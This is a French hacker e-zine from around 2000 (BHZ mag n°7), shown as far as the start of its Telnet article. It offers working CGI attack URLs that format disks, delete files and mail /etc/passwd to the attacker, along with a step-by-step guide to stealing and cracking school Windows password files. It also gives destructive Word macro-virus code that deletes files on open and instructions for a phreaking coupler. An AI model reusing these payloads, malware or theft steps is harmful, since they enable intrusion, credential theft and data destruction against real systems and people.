The Belgian Hackers Zone : http://www.thebhz.org - http://www.thebhz.com - http://www.bhz.be.tf - http://members.xoom.com/thebhz - http://thebhz.ctw.net TTTTTTTTTTTTTTT HHH HHH EEEEEEEEEEE TTT HHH HHH EEEEEEEEEEE TTT HHH HHH EE TTT HHH HHH EE TTT HHH HHH EEEEEEEE TTT HHHHHHHHHHHH EEEEEEEE TTT HHH HHH EE TTT HHH HHH EE TTT HHH HHH EE TTT HHH HHH EEEEEEEEEEE TTT HHH HHH EEEEEEEEEEE ZZZZZZZZZZZZZZZZZZZZZZZZ BBBBBBBBBB HH HH ZZZZZZZZZZZZZZZZZZZZZ BBB BBBBBB HH HH ZZZ BBB BBBB HH HH ZZZZZ BBB BBBBB HH HHH ZZZ BBB BBBB HH HHH ZZZZ BBB BB HH HH ZZZZ BBB BB HH HH ZZZ BBB BBB HH HHH ZZZZ BBB BBBBB HH HHH ZZZZ BBB BBBBB HH HHH ZZZZ BBB BBBB HHHHHHHHHHHHHH ZZZZZZ BBB BBBBB HHH HHH ZZZZZZ BBBBBBB HHHHHHHHHHHHHHH ZZZZZZ BBB BBBBB HHH HH ZZZ BBB BBBB HHH HH ZZZZZ BBB BBBBB HHH HH ZZZZZZZ BBB BBBBB HHH HH ZZZZZZZZ BBB BBBBB HHH HH ZZZZZZZZ BBB BBBBBB HHH HH ZZZZZZZZZZZZZZZZZZZZZ BBBBBBBBBBBB HHH HH ZZZZZZZZZZZZZZZZZZZZZZZZZZZZZ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ bbb h h zzzzzzzzzzz 77777777777777 b bb h h z 77 b bb h h z 77 b b h h z 77 b bb h h z m m aaaa ggg 77 b bb hhhhhhh zz mm mm a a g 777777777 bbb h h zz m m m m a a g 77 b b h h z m m m a aa a g gggggg 77 b b h h z m m a a g g 77 b b h h z m m a a g g 77 bbb h h zzzzzzzzzzzz m m a a ggggg 77 _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ SOMMAIRE >-------------------------------------|--------------------> | ARTICLE | AUTEUR | <-------------------------------------|--------------------> | Introduction | Asmodeus | 1...........| Exploits | tRaSH | 2...........| Turorial sur le Perl | Asmodeus | 3...........| Voler les mots de passe de son ecole| wHyAnGeL | 4...........| Programmation de macro-virus | tRaSH | 5...........| Coupleur téléphonique | Cyriusvirus | 6...........| Buffer Overrun de MSIE | wHyAnGeL | 7...........| Telnet Décortiqué | tRaSH | 8...........| Tutorial de cracking n°3 | GRIm@ | 9...........| Hacker sa fac | CyriusVirus | 10..........| Vidage de la pile CMOS | tRaSH | 11..........| Mode d'emploi de la VMB IGLO-OLA | nada | 12..........| Les code-barres | CyriusVirus | 13..........| L'Intelink | nada | 14..........| Hack defi | tRaSH | 15..........| Securiser son systeme Linux | Asmodeus | 16..........| Les requests des scripts CGI | wHyAnGeL | 17..........| La chtite pensee anarchique n°2 | GRIm@ | | Mot de la fin | Asmodeus | <-------------------------------------|--------------------> _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ BHZ mag n°7, dejà. En ce debut d'annee scolaire, quand tous s'appretent à reprendre le chemin du travail, voire ont dejà repris, BHZ Mag n°7 est là. Apres avoir consacre une bonne partie de ces vacances à sa redaction (souvenez vous : BHZ mag n°6 est sorti le 14 juillet). Quel constat pouvons nous tirer en lisant ce zine ? Le BHZ est vraiment devenu un groupe, un ensemble, en regardant la partie "auteurs" du sommaire, on peut voir six noms, le groupe est compose de 11 membres, tous les autres, ceux qui n'ont pas participe à la redaction de ce zine sont quand meme restes actifs quand ils etaient chez eux. Certains peut etre un peu trop actifs (comme par exemple quand Flat Eric s'amuse à me faire courrir parce qu'il a la bonne idee de piquer un lecteur de carte à puces en pleine journee, quand GRIm@ me bat aux Echecs-VMB, quand Flat Eric essaie de phreaker les cabines Belgacom avec comme simple outil son super-couteau-qui-tue, etc...) Bon comme vous avez du le remarquer en lisant le sommaire, certains ont ecrit plus d'articles que d'autres et, comme vous le remarquerez en lisant le zine, certains articles sont (beaucoup) plus longs que d'autres. On s'en fout completement, ce qui compte c'est ce qu'il y a dedans. Voilà c'est tout. Bonne lecture. 1. Exploits by tRaSH 2. Tutorial sur le Perl by Asmodeus 3. Voler les mots de passe de son ecole by wHyAnGeL 4. Programmation de macro-virus by tRaSH 5. Coupleur telephonique by Cyriusvirus 6. Telnet decortique by tRaSH 7. Buffer Overrun de MSIE by wHyAnGeL 8. Tutorial de cracking by Grim@ 9. hacker sa fac by CyriusVirus 10. Vidage de la pile CMOS by tRaSH 11. Mode d'emploi de la VMB Igloo-Ola by nada 12. les codes barres by CiriusVirus 13. L'Intelink by nada 14. Hack defi by tRaSH 15. Securiser son systeme Linux by Asmodeus 16. Les requests des scripts CGI by wHyAnGeL 17. La chtite pensee anarchique n°2 by GRIm@ 18. Le mot de la fin by Asmodeus _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ************ * Exploits * ************ Auteur : tRaSH -Exploit : qu’est ce qu’un exploit ? C’est une commande ou une suite de commande qui, une fois rentrée, permettent de chopper le root sur un serveur. Les exploits sont trouves par une personne quelconque (toi ou moi), qui tombe dessus soit par hasard ou en cherchant longtemps. Un des exploits des plus connus est quote user FTP, sous FTP. Il existe des millions d’exploits trouves ou (encore) inconnus, EN CHASSE ! ! ! Exemple d’exploit sous IIS, serveur NT :http://www.victime.com/scripts/iisadmin/ Cet exploit fonctionne comme ceci, l’URL va chercher le fichier pwd de l’admin du serveur sous IIS. Je dis exploit, mais on peut aussi choper le root en trouvant le fichier pwd, faisant du social engineering, voici un chtit trucs (attrape lame) sur lequel je suis tombe (par hazard) : Le type disait que pour devenir admin’ sur caramail, c’était très simple. On remplissait son formulaire (demandant pseudo et pass caramial) et on faisait «ok » c’est sans dire qu’ok résultait à envoyer ses infos a son e-mail (au passage, son e-mail était hack_admin@caramil.com pour augmenter le réalisme sans doute !)Cet exemple prouve que l’on peut trouver des exploits de la mort en 4 commandes comme on peut trouver des pass en profitant de faille encore plus vulnérable : les gens ! Voici une liste de bugs cgi et d’exploit décortiqué : http://target.com/cgi-bin/perl.exe?-e?'format?c:' Exploite perl pour formater le disque c : , con mais efficace http://target.com/cgi-bin/perl.exe?-e?'format%20c:' Idem http://www.target.com/cgi-bin/perl.exe?&-e+unlink+%3C*%3E La, c’est un peu mieux, vous savez que pour avoir une URL, on s’adresse a une boite qui associe votre IP a l’URL désirée, ok ? Cette commande défait le lien URL=> IP, donc erreur 404 pour ceux qui tape l’URL de la cible Là, je vais me faire taper sur les doigts par x pass car il m’a demande d’expliker TOUS les exploits que je mets voici une liste d’exploit a essayer sur des serveurs, mais ca depend des logiciels que l’admin a installé Aglimpse, exploit a faire en telnet port 80 (il faut que la bécane aie aglimpse) tapez ceci dans telnet (en remplaçant moi@ici.be par votre e-mail) GET /cgi-bin/aglimpse/80|IFS=5;CMD=5mail5hack\moi@ici.be\ </etc/passwd;eval$CMD;echo HTTP/1.0 La commande demande au serveur d’envoyer etc\passwd (fichier password) a moi@ici.beOu encore en telnet (cette fois, il faut campas) GET /cgi-bin/campas?%0acat%0a/etc/passwd%0a Le fichier password est édité sous telnet par cat (sous linux), on va profiter du cat de la victime, non mais ! Il faut carbo, url a taper (en remplaçant file_a_voir par ce que vous voulez genre passwd.pwd ou autre) http://www.ici.be/carbo.dll?icatcommand=file_a_voir&catalogname=catalog Sous NT, il faut cgimail et qu’un user voie cette page : <form action="/scripts/CGImail.exe" method="POST" NAME="TestForm"> <input type=hidden name="$File$" value="/scripts/template.txt"> <input type=hidden name="$Subject$" value="CGImail Example"> <input type=hidden name="$LocationOK$" value="/ok.html"> <input type=hidden name="$LocationKO$" value="/ko.html"> <input type=hidden name="$To$" value="moi@ici.be"> <input type=hidden name="$Optional$" value="mmmh, no!"> La, ca envoie le fichier /scripts/template.txt à moi@ici.be, bien sur on peut remplacer template.txt par autre chose. Dumpenv.pl, sous NT ou win 95/98 : http://www.site.net/c:/program files/sambar41 Cool, si le serveur a ce fichier, vous pourrez alors remonter dans l’arborescence des fichiers (et arriver dans c : \, le rêve). On peut le refaire dés que l’on connaît (et qu’on est sur) de l’emplacement d’un fichier. Bon, je peux pas vous mettre plus d’exploit car il y en a des centaines voir des milliers, a vous de trouver. _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ******************************** * Tutorial sur le langage Perl * ******************************** Auteur : Asmodeus Le PERL (Practical Extraction and Report Language) est (comme l'indique son nom), un langage d'extraction et de rapport. On peut s'en servir pour beaucoup de choses (un scanneur de failles CGI par exemple). Ses premieres utilites furent, par exemple, le listing de fichiers d'un tel type dans des gros repertoires ou l'exploration de tres gros fichiers (des logs par exemple) à la recherche d'un mot ou d'une expression. C'est, à l'instar du Java, un langage interprete (ce qui signifie qu'une compilation n'est pas obligatoire, tant que l'on a un interpreteur pour son systeme d'exploitation (il est donc multi-plateformes) On peut, cependant, grace à des utilitaires comme perl2exe, creer des executables Windows pour ceux qu ne disposent pas d'un interpreteur ou si l'auteur ne veut pas montrer la source de son programme. Un des autres avantages du Perl, par rapport à de plus anciens langages, est ses possibilites au niveau d'Internet et des reseaux. (Sans pour autant avoir besoin de tout plein de bibliotheques...) Le langage PERL a ete invente par Larry Wall. C'est un des lanages les plus utilises pour la programmation de CGI. (definition : Une interface cgi-bin est constitué d’un exécutable qui peut être écrit dans n’importe quel langage de programmation, capable de recevoir sur le flux d’entrée standard, ou en arguments, les données correspondant à une "requête" émise par le "client" via un "formulaire", d’analyser et traiter ces données, et capable de lui donner une réponse ou d’exécuter une action telle qu’inscription dans une base de données, émission d’un courrier électronique, d’un fax, mise en page dynamique d’un résultat de recherche, etc...) A priori, n’importe quel langage de programmation pourrait convenir, du moment que les ressources du langage permettent : - La lecture du flux de donnée d’entrée ou la récupération de paramètres donnés par la ligne de commande. - L’écriture d’une réponse sur le flux standard de sortie, par défaut redirigé vers le socket d’arrivée de l’utilisateur. Historiquement, le développement de serveurs Internet ayant été très fortement lié au monde Unix (ce qui est normal d'ailleurs), les deux langages majeurs actuels servant au codage des cgi-bin sont le C et le PERL. L’évolution rapide des technologies réseau fait apparaître petit à petit des cgi-bin codés en Java. Leur nombre est croissant, mais encore largement minoritaire par rapport aux " serveurs " écrits en C ou en Perl. Le Perl dispose de structures de données très puissantes pour la gestion de données sous forme de chaînes de caractères. De plus, tout comme le shell Unix, le Perl dégage l’utilisateur des soucis d’allocation dynamique de mémoire, et offre une grande souplesse d’écriture de part son "typage" faible (les variables utilisent des types implicites qui sont analysés à l’interprétation par Perl, et qui ne demandent pas de précautions particulière dans la majorité des cas). La contrepartie de cette souplesse est une certaine limitation du champ d’action du langage. Le C dispose en effet d’une bibliothèque bien plus large de fonctions et structures prédéfinies. En outre la syntaxe du Perl, récupérant de nombreuses sémantiques du shell Unix et du langage awk, rend ce langage plus ardu à maîtriser. (sauf pour ceux qui ont l'habitude de programmer en shell Unix (coucou Veinscuts !!!) mais dans ce cas je suppose qu'ils connaissent dejà un peu le langage Perl et ce tutorial ne les concerne alors pas (ou peu)) Mais revoir les principes de base d'un langage, ca n'a jamais fait de mal à personne !!! alors que vous soyez debutant initie, expert, voire totalement etranger au langage Perl, si vous lisez ceci c'est que vous vous y interessez quand meme. Dans ce cas, pourquoi ne pas continuer ? Les caracteristiques du langage Perl : Le Perl, à l’instar du langage script shell, est très libéral en matière de types de variables. Les variables sont automatiquement affectées à un type au moment de leur première utilisation. En outre, le langage Perl n’impose pas, contrairement au C, une déclaration préalable des variables. exemple : #!/bin/perl $variable1 = 12 ; $variable2 = "une chaîne" ; Dans l'exemple précédent, la variable variable2 est automatiquement initialisée du type "chaîne" et la variable variable1 du type entier. Au cas où vous ne l'auriez pas remarque, le $ sert à la declaration de variables. Quand au #!/bin/perl , c'est pour indiquer le repertoire ou se trouve l'interpreteur (par defaut /vin/perl). Le Perl prend en charge dynamiquement l’allocation mémoire nécessaire aux structures de données, qu’elles soient scalaires ou tableaux. Exemple : #!/bin/perl $tableau[2] = "12" ; Le début de fichier précédent crée un tableau de 3 éléments et alloue automatiquement l'espace nécessaire pour deux éléments vides, et un non vide contenant la chaîne "12". Si dans la suite du programme, la ligne : $tableau[10] = 23.4e+12 ; apparaît, le tableau est implicitement étendu en mémoire sans autre intervention du programmeur. (à noter que la valeur de la variable dans la 10eme case du tableau est ici une flottante) Le Perl résout automatiquement la conversion de variables chaîne en variables de type scalaire. Si la chaîne ne peut être interprétée comme un nombre valide, quans on l'utilisera dans une expression numerique (un calcul quoi) le programmera la conversera en valeur nulle (un zero quoi) Exemple 1 : #!/bin/perl $variable_num = 333 ; $variable_txt = "222" ; $somme = $variable_num + $variable_txt ; print("$somme") ; Exemple 2 : #!/bin/perl $variable_num = 123 ; $variable_txt = "plif plaf plouf" ; $somme = $variable_num + $variable_txt ; print("$somme") ; Dans l'exemple 1 les deux variables variable_num et variable_txt sont,la premiere un nombre, et la deuxieme une chaîne. Et pourtant le résultat est bien 555. La fonction print convertit la valeur numérique 555 en chaîne "555" pour en effectuer l'affichage. Dans l'exemple 2, le résultat est 123, la chaîne "plif plaf plouf" valant 0 dans son interprétation numérique. Le Perl dispose d'une caractéristique extrêmement utile, et qui lui donne une grande partie de sa puissance. C'est celle qui consiste à automatiquement dimensionner l'action de certaines expressions suivant que la variable réceptacle est une variable scalaire, ou une liste. De nombreuses fonctions standard du Perl ont ainsi un double fonctionnement, et permettent des opérations globales sur des tableaux avec la même syntaxe qu'une opération sur une variable scalaire : #!/bin/perl $scalaire = <STDIN> ; @tableau = <STDIN> ; Les deux lignes ci-dessus ont bien la même forme (lire dans STDIN). Mais leur action est quand meme différente: - La première vient lire une ligne du tampon STDIN et s'arrete au premier \n qu'elle rencontre. - La deuxième lit tout le tampon STDIN, et met chaque ligne dans une nouvelle "case" du tableau @tableau. Le Perl integre une notion de substitution.Cette notion est récupérée du Korn shell Unix. Une variable peut se substituer par sa valeur lorsqu'elle est dans une chaîne de caractères entre double cotes. #!/bin/perl $variable = "Asmodeus" ; print("qui est le plus fort ?\n $variable"); qui est le plus fort ? Asmodeus Types de donnees ---------------- Les 4 structures de donees majeures existant en Perl sont : -les variables (scalaires, numériques ou caractères) -les listes -les tableaux -les tableaux associatifs Une variable scalaire contient un nombre ou une chaine de caracteres. Pour etre declaree, son nom doit etre precede de $ . Exemples de variables scalaires : "354", "-22", "3_567_890", "033", "0x3E" (numeriques). Et "je programme en Perl" (chaine de caracteres). Les chaines de caracteres doivent etre encadress d'apostrophes ou de guillemets ( ' ou " ). Insertion de variables dans des fichiers : #!/bin/perl $variable = "waouuuu j ecris dans un fichier" ; open (FILE, ">tralala" ; print FILE ("$variable") ; close (FILE) ; Ce script cree un fichier tralala (dans le meme repertoire que le script) et ecrit dedans la variable $variable. Une liste en Perl est une association de variables scalaires, dans un certain ordre. Ces listes peuvent être rangées sous forme d'une variable tableau, ou d'un tableau associatif. Une liste peut réunir tout type de données, y compris des variables, et dans ce cas la valeur de l'élément de la liste prend la valeur de la variable au moment où la liste est interprétée. La fonction des tableaux consiste à reunir des éléments dans une table indexée. En Perl, l'absence de typage permet de construire des tableaux contenant des valeurs numériques ou des chaines de caractere. Un tableau est toujours utilisé en faisant précéder son nom du @. Chaque element d'un tableau est une variable scalaire portant le même nom que le tableau et donc précédée de $ et suivi de l'index. Exemple : #!/bin/perl $variable = "tralala" ; @tableau = (1, 2.35, "une chaine\n", "$variable") ; print ("$tableau[1]\n") ; print ($tableau[3]) ; } Le resultat : 1 une chaine Les tableaux associatifs ont la meme fonction que les tableaux normaux. La difference c'est le mode d'indexage du tableau. L'index utilisé dans les tableaux associatifs est une chaine de caractère. Ils permettent donc d'associer n'importe quelle valeur à une chaîne, par exemple la chaîne "masculin" à la chaîne "sexe" dans un tableau %identite qui définirait les caractéristiques d'une personne. L'accès à une variable contenue dans un tableau associatif se fait par une variable scalaire du même nom que le tableau indexées par une chaîne contenue dans une expression {}. #!/bin/perl $identite{"sexe"} = "masculin" ; $identite{"age"} = "69" ; $identite{"taille"} = 1.72 ; foreach $membre (%identite) { print("$identite{$membre}\n") ; } Le resultat : masculin 69 1.72 Les operateurs -------------- Alors dans les operateurs y'a les operateurs arithmetiques qui sont les memes qu'en C : - soustraction, + addition, * multiplication, / division, %modulo, ** exponentiation. Les operateurs de comparaison : == est egal à, =! n'est pas egal à, > est plus grand que, < est plus petit que, >= plus grand ou egal, <= plus ptit ou egal. Ces operateurs servent pour les valeurs numeriques. Pour les comparaisons de chaines les operateurs sont les suivants : eq est egal à, ne n'est pas egal, gt est plus grand que, lt est plus ptit, ge plus grand ou egal, le plus ptit ou egal. Les opérateurs binaires : & et binaire, | ou binaire, ^ ou exclusif binaire, - complément à 1, << décalage vers la gauche, >> décalage vers la droite. Les operateurs logiques : && et logique, || ou logique, ! negation logique. Il y a aussi les and, or, not et xor. Les operateurs arythmetioques peuvent se combiner à = pour devenir un operateur d'affectation (+= est incrementation par exemple). (hum tout ca ressemble beaucoup au C non ?) Les operateurs de repetition de chaines permettent de... repeter des chaines !! exemple : #!/bin/perl $variable1 = "prout " ; $variable2 = $variable1 x 6 ; print ("$var2") ; le resultat : prout prout prout prout prout prout Les instructions ---------------- if condition {partie1} else {partie2} Cette instruction execute la partie1 si la condition "condition" est vraie sinon elle execute la partie2. Y'a aussi {partie1} unless condition Ca veut dire qu'il execute la partie & sauf si la condition est vraie. while condition {partie1} il execute la partie 1 tant que la condition est vraie. Pour sortir d'une boucle, on peut utiliser les instructions Last ou Next. Les operateurs de recherche : ce sont des operateurs permettant des recherches avec plusieurs options : x : ignore les blancs ; g : cherche tous les modeles ; i : ignore la casse ; s : chaine --= une seule ligne ; m : chaine --= plusieurs lignes ; o : traite le modele une fois. $var =~ /[tralala]/xgismo Lire et ecrire dans les fichiers -------------------------------- manipulation : voici les operations effectuables avec les fichiers et les repertoires : manipulation, deplacement, rennomer, lister, etc... Les commandes : mkdir : cree un repertoire chdir : change de repertoire opendir : ouvrir un rep pour le lire readdir : lit la prochaine entree d'un repertoire telldir : indique la position dans le repertoire seekdir : change de position rewinddir : revenir au debut du repertoire closedir : fermer le repertoire rmdir : supprimer le repertoire Pour ouvrir un fichier on utilise la commande open() open (FICHIER, "tralala.txt"); et pour le fermer la commande close() close(FICHIER); Pour lire on utilise la fonction read() read(FILE, $variable, Longueur, SkipOption); $variable represente la variable où on stocke les caracteres lus. Longueur represente le nombre de caracteres. Pour ecrire dans un fichier, on utilise les commandes print(), printf(), write() une fois celuici ouvert. print fichier (liste_d_arguments); Pour se deplacer dans un fichier, on utilise les commandes seek() et tell() seek(FICHIER, $distance, 1) distance est la valeur du deplacement (positif pour en avant et negatif pour en arriere) Ce tutorial est à utiliser en plus des fichiers d'aides fournis avec l'interpretreur gnu qui decrivent TOUTES les commandes. Toutefois, dans un prochizn zine, j'ecrirai la suite de ce tutorial qui comprendra les commandes importantes autres que celles vues ici. _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ******************************************************* * Comment voler tous les mots de passe de votre ecole * ******************************************************* Auteur : wHyAnGeL Date : 01.08.00 Titre : Comment voler tous les mots de passe de votre école. Avant de commencer cet article je tiens à remericer @nTraX qui m'a aidé à réaliser ce projet. Je crois que sans lui je n'y serais pas parvenu aussi vite. Comme vous le savez certainement, toutes les école travaile sous Windows NT (IIS 4.0 la plupart du temps), je n'ai jamais vu ou entendu parler d'une école qui travailler avec Linux RedHat ou bien un autre du même type (j'ai dit RedHat car c'est le Linux grand public). Ce ne serait pas sérieux de la part d'une école élitiste (mouharf !) de travailler avec un OS en open source. Sachez tout d'abord qu'il y a souvent quatre types d'accés : * Ceux des élèves qui se résume souvent à internet, interdiction d'utiliser les disque amovible tel que les disquettes ou les zip. * Les proffesseur qui peuvent faire le même que vous, plus imprimer et enregistrer des données sur un disque amovible. * Les 'sk00l r00tz' ou plutot les admins, souvent se sont des professeur qui ne savent même pas coder, ils peuvent tout faire sauf changer de proxy et supprimer les accès des admistrateurs. [ND Asmodeus : c'est le prototype des gens que je deteste et qui me detestent (mais pourquoi donc ?)] * Les 'adm1n1stratorz' (ca me fais trop rire :), ils peuvent tout faire, mais ne viennent jamais sur les lieux sauf si un problème grave se pose, style hack du serveur ou coup de pied au cul du PC n°5 :). Windows utilise deux façons de logger les codes (en fait c'est juste une encryption différente et un autre format de fichier). Il existe les *.sam et les *.pwl. Comme les écoles utilisent (presque) tout le temps le système de login en *.pwl, c'est sur ceux là que nous allons nous attarder. J'ai oublié de vous dire que pwl signifie password list. @nTraX ayant trouvé une façon de procéder assez simple mais qui ne fonctionne pas tout le temps, j'ai en créé une autre et je vous explique les deux. La première étant plus facile mais il faut que vous pouviez avoir accès au root directory c'est à dire à la racine, où sont stocké tous les *.pwl. =============== == Facon n°1 == =============== * Essayez d'avoir le mot de passe d'un copain (héhé) à vous pour démarrer votre session, ce sera plus sur. Si vous n'en avez pas trouvez, ce n'est rien utilisez le vôtre. * Trouvez un HD vide sur le PC, normallement ca ne devrait pas être trop dur, il y en a plein. * Passez par le poste de travail ou par l'explorateur Windows pour allez dans le dossier C:\Windows ou c:\Win NT. * Réorganisez les icônes par type et sélectionnez tous les *.pwl. * Faites copier (ctrl+c). * Faites coller dans l'HD vide (ctrl+v). * Si un quelconque progs de sécurité vous en empêche, clickez avec le boutton droit de la souris et envoyer les vers A:\, c'est à dire la disquette. Si le lame sécurity © vous en empêche toujours passez à la façon n°2. * Après la prise de passwords le décryptage, pour ce faire utilisez un petit utilitaire nommé Cain (la version 1.51 minimum s'impose), tu peux le downloader à cette URL : http://warex.box.sk/crackers.htm. * Installez le et éxécutez le. * Cliquez sur l'icône à gauche nommé PWL Files (les troisièmes en partant du bas vers le haut). * Cliquez sur le + (en au à gauche) et ajoutez vos copies. * Crackez les. Explication : si le fichier s'appelle e2e11.pwl l'usre name sera e2e11. Prenez exemple sur votre password pour le crack, ne mettez pas les caractères spéciaux quand vous crackez par brute force. * Si vous n'avez qu'une heure, se ne sera pas assez, laissez le cracker et apuyez sur alt+del pour le cacher. Vous reviendrez en fin de journée, pour le faire réaparaître appuyez sur alt+pgup. =============== == Façon n°2 == =============== Il suffit de faire la même chose qu'à la façon n°1 à part que pour voir les *.pwl vous devez taper sous dos : dir %systemroot\*.pwl Normallement ceci va apparaître : Volume in drive C has no label Volume Serial Number is 6352-7G15 Mais avec vos informations. Bon crack ! _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ******************************** * Programmation de macro virus * ******************************** Auteur : tRaSH -programmation de macro virus : une macro est un mini programme intégré dans un document word. Ces programmes sont écris en Visual Basic, et très simple a réaliser. Créez un nouveau document Word, enregistrez le et cliquez sur outils, macro, macro, ok ? Tout d'abord, le programme doit contenir comme première ligne sub "AutoOpen " qui permettra de lancer le programme automatiquement au chargement du fichier word. Comme dernière ligne, il devra contenir "sub viewvbcode " puis directement "end " a la ligne suivante, c'est pour rendre la macro invisible. La programmation ressemble de loin à du Q-Basic avec des commandes qui diffèrent légèrement. Voici un exemple de programme commente (les commentaires sont précède d'une " ' " ) : sub autoOpen ()''macrovirus 'macro enregistree le 0/0/00 par tRaSH' msgBox "voici une macro " 'affiche l'avertissement "voici une macro " kill "c : \*. doc " 'detruit tous les fichiers doc present dans la racine msgBox " systeme bloque ", SystemModal + vbOKCancel " 'affiche 'l'avertissement " systeme bloque " et 'bloque tout le systeme tant que l'on n'a 'pas clicke sur ok ou annuler num = int(rnd * 10) 'tire un nombre au hazard compris entre 1 et 20 msgBox num 'affiche le nombre tire au hazardendOn peut faire mieux : Sub autoOpen ()Num = int(rnd * 10)If num = 6 then kill "c : \*. * " Else msgBox "tu as de la chance… "End Ce programme est une sorte de casino de la mort. Il y a des centaines de commandes, pour en savoir plus, consulte un bon bouquin sur le visual basic. _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ************************* * Coupleur telephonique * ************************* Auteur : CyriusVirus Introduction Vous avez toujours reve pouvoir hacker a partir de votre ordinateur et d' un telephone cellulaire (phreaké ou non). La plupart des vrais hackers etrangers se sont deja tourne depuis pas mal de temps vers cette solution, qui leur permet de ne pas se faire tracer tres facilement. Les paires d' Esn/min ne sont plus difficiles à obtenir et si utilisées soigneusement durent beaucoup plus longtemps que des télécartes, des codes et la plupart des autres méthodes de sabotage de téléphone. Ce texte explique comment relier facilement n'importe quel téléphone cellulaire à un modem, sans devoir acheter une interface de ligne cellulaire ou un dispositif semblable. Ce dont vous aurez besoin pour acomplir ce projet: 1 téléphone de bureau 1 prise téléphonique male/femelle 2 morceaux de fil (30cm chacun) 1 rouleau d' etain 1 ruban adhesif Vous aurez besoin également d'un fer à souder, d' une pince à dénuder et d'un tournevis. Instructions: 1. Ouvrez le combiné de votre téléphone. Retirez le haut-parleur et le microphone du bâti de plastique et coupez les fils qui y sont reliés. 2. Soudez maintenant les 30cm de fil sur les fils existants du haut-parleur et du microphone du combiné. Une fois que vous avez fait ceci, resoudez simplement le haut-parleur et le microphone sur le câblage du combiné téléphonique. 3. Placez le haut-parleur du combiné téléphonique sur le microphone de votre téléphone cellulaire et fixez le tout par du rhuban adhesif. Ceci tient non seulement le haut-parleur du combiné téléphonique en position, mais empêche également des problèmes de bruit de fond. 4. Placez maintenant le microphone du combiné téléphonique au-dessus du haut-parleur de votre téléphone cellulaire et enveloppez de rhuban adhesif. Comment utiliser le dispositif: Fondamentalement, ce que vous avez fait est transformer votre téléphone de bureau en dispositif acoustique de type coupleur. Pour utiliser le dispositif, suivez simplement les instructions ci-dessous. 1. Branchez votre double prise de téléphone à votre téléphone. Branchez votre modem dans l' autre prise. 2. Laissez votre téléphone décroché, jusqu' à ce que la ligne soit morte (c.-à-d. jusqu' à ce que ca sonne occupé). 3. Composez le numéro de modem que vous voulez appeler sur votre portable, et pressez OK. 4.1. Si vous voulez composer un numéro de modem type bbs ou vax/vms, tapez Atd dans votre terminal et pressez entrer. Votre modem devrait maintenant attendre un signal convoyeur de votre téléphone cellulaire. 4.2. Si vous voulez composer le numéro d' un provider internet, configurez votre acces réseau distant en connexion manuelle, cela permet à l' utilisateur de composer manuellement sur le téléphone connecté sur votre modem le numéro à composer, puis lorsque le numéro est composé, cliquez sur 'connexion', et votre modem se connectera tout seul comme un grand à la porteuse. Diagramme du dispositif: __ : : : : ________:__:_ ______ : : / : /:: ::::: : / :---+ +--------------: :: ::::::: : haut-parleur / :-+ : : +------------: :: ::::: : : ____: : : : : \:: _________ : : / : : : : : : : : : : : : : : : :_________: : : : : : : : : : : : : +-- : : ---------+ : [1][2][3] : : : +---- : : -------+ : : [4][5][6] : : : : : : : : [7][8][9] : : : : : : : : [*][0][#] : : : : : : : : _ _ _ : : \____ : : : : : [_][_][_] : : : : : : : /:: : \ :-------+ : : +-: :: ::: : microphone \ :---------+ +---: :: ::: : \______: \:: : : :_____________: : : telephone cellulaire : telephone de bureau Comment cela fonctionne: Le signal convoyeur du modem à distance sera envoyé du haut-parleur de votre téléphone cellulaire et dans le microphone du combiné téléphonique. Votre modem recevra toutes les données envoyees dans le combiné téléphonique après que la commande Atd ait été émise (respectivement, que vous ayez lance la connexion en mode manuel de l'acces reseau distant pour le net). De la même manière, tous les signaux convoyeurs de votre modem seront envoyés du haut-parleur du combiné téléphonique vers le microphone du téléphone cellulaire. Au moment ou je vous ecris, je ne me suis pas connecte a des vitesses plus elevees que 2400 bauds, mais ceux utilisant de bons portables et de bons reseaux (la, on comprend l' utilite du son Digital ;) ne devraient avoir aucun probleme pour se connecter à plus hauts débits (pas du 14.4 kan meme!). Je n'ai pas écrit ce texte pour que les gens l'employent a transférer de grandes quantités de données a grande vitesse. C'est simplement un guide pour expliquer à quel point il est facile d'utiliser n'importe quel téléphone cellulaire avec un modem. 2400 bauds peuvent être lents, mais il est très bien pour hacker des vax/vms, appeler votre BBS souterrain favori ou transferer des fichiers des textes, envoyer des emails... Vous pouvez egalement utiliser ce dispositif pour connecter un ordinateur portable relie a un modem PCMCIA sur le combiné d' une cabine téléphonique. L' avantage serait dans ce cas de pouvoir émuler une carte de telephone, pour ne rien payer (allez BOB, au travail!!). Je vous fais confiance pour adapter cette technique a vos besoins... \ _:// \\:_ / _)\\//(_ _)\\//(_ ---------- \\_o\/o_/ CyRiUsViRuS \_o\/o_// ---------- |||||| 2000 |||||| '||||' '||||' CyriuSoft (c) contact me : cyriusvirus@yahoo.fr _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ _______________________________________________________________________________________________ ----------------------------------------------------------------------------------------------- _______________________________________________________________________________________________ ********************* * Telnet decortique * ********************* Auteur : tRaSH - Telnet décortique : telnet permet une communication bidirectionnel (A=> B et B=> A), sur une base d'octet de 8 bits. Les connections sont en TCP intercale de séquences telnet. Ce protocole est base sur trois principes : 1. le network virtual terminal, qui permet un échange standard sans pour cela retenir toutes les spécifications de 